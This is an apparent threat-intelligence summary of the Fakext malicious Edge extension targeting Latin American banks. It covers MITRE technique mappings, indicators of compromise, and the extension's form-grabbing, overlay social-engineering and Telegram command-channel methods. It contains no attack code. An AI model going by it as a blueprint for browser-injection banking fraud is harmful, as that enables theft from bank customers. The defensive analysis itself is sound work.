Keypoints
- Infection vector: a malicious Microsoft Edge extension (SATiD) designed to persistently inject scripts into pages.
- Loader and C2: the extension fetches a loader from multiple C2 servers and uses Telegram’s API as an additional command-and-control channel.
- Fingerprinting: Fakext downloads FingerprintJS to generate a “fkr-client-uid” document attribute used to identify victims and gate payloads.
- Payload modules: two primary modules — a generic form grabber that logs input fields and an overlay injector that simulates bank support to coerce RAT installation.
- Evasion: network traffic is masked through domains crafted to resemble legitimate CDNs/frameworks and the code uses obfuscation, native overrides and anti-debugging to hinder analysis.
- Data theft and fraud flow: captured form data and overlay state are exfiltrated (example GET requests), RAT credentials are collected via overlays, and the attacker can perform transactions using the stolen session/context.
MITRE Techniques
- [T1547] Persistence – The extension provides a persistent mechanism to inject scripts into the victim’s HTML page. [‘The sole purpose of the extension is to provide a persistent mechanism to inject scripts into the victim’s HTML page.’]
- [T1071] Application Layer Protocol – Fakext uses HTTP and Telegram API calls for command-and-control and to send screenshots/state to C2. [‘Fakext uses Telegram’s application programming interface (API) as another communication channel with the C2 servers. The current state of the injection and even screenshots are sent using Telegram.’]
- [T1056] Input Capture – The malware hooks into input fields and exfiltrates full input elements on keypress. [‘a form grabber that logs all input fields on the page’ and ‘Once a keypress occurs, the entire input element… is sent to the C2 server.’]
- [T1041] Exfiltration Over C2 Channel – Captured inputs and overlay state are sent to C2 via HTTP GET requests. [‘Figure 2: Example GET request with exfiltrated data’]
- [T1204] User Execution (Social Engineering) – Overlays impersonate bank IT support to coerce users into downloading and installing a RAT. [‘the popup prompts the user to download a legitimate remote access tool (RAT) and provides the fraudster with the tool’s credentials.’]
- [T1078] Valid Accounts – Collected RAT credentials and session/context are used by fraudsters to perform transactions and other financial fraud. [‘With RAT credentials, knowledge of the user, banking app state and the ability to inject certain pages… the fraudster can perform transactions and other types of financial fraud.’]
Indicators of Compromise
- [Domains] C2 and evasion domains – fastify.elfaker.workers.dev, jschecks.com, and other similar domains used to host loader/payloads (and 6 more domains).
- [HTML attribute] Document fingerprinting marker – fkr-client-uid (attribute of the top-level document element) used to identify infected browsers.
- [Malicious extension] Edge store add-on URL – https://microsoftedge.microsoft.com/addons/detail/satid/odpnfiaoaffclahakgdnneofodejhaop (SATiD extension page).
- [File hashes] Extension component hashes – contents.16a81c08.js (043bac1634491871ece146331382aaec), oot.72e07fb5.js (1ef985af2759d1212c2434429b627f30), and 10 more hashes.
Fakext is deployed as a persistent Edge browser extension that loads a remote “loader” script into the page context and uses that loader to gate and fetch additional modules based on the current URL and a fingerprint-derived ID. The extension pulls FingerprintJS from a legitimate CDN to compute a browser fingerprint and writes it as the top-level document attribute fkr-client-uid; the loader checks that ID and the page URL against a hardcoded list of target banks before downloading targeted modules from C2 infrastructure. Command-and-control traffic uses normal HTTP(s) endpoints and the Telegram API (the extension sends injection state and screenshots to Telegram), while domains mimicking CDNs are used to blend malicious requests with benign traffic.
Once active on a targeted site, Fakext runs two primary modules: a form grabber and an overlay injector. The form grabber hooks into input events and transmits the entire input element (style, id, type, value) and the page URL back to C2 via GET requests, enabling precise credential and context theft. For higher-value targets, the overlay module injects UI that matches the bank’s styling, blocks normal page interaction, and simulates “IT support” prompts instructing victims to install legitimate remote access tools (e.g., TeamViewer); the overlay continuously reports its state (which popup page, pre/post-login status, RAT installed) to the attacker, who can then use RAT credentials plus session/context to carry out fraudulent transactions and OTP interception. The extension uses code obfuscation, native function overrides and anti-debugging tricks to defeat analysis, and because the extension overrides browser behavior, native protections like CSP, SSL or CORS do not prevent these injections.
Read more: https://securityintelligence.com/posts/fakext-targeting-latin-american-banks/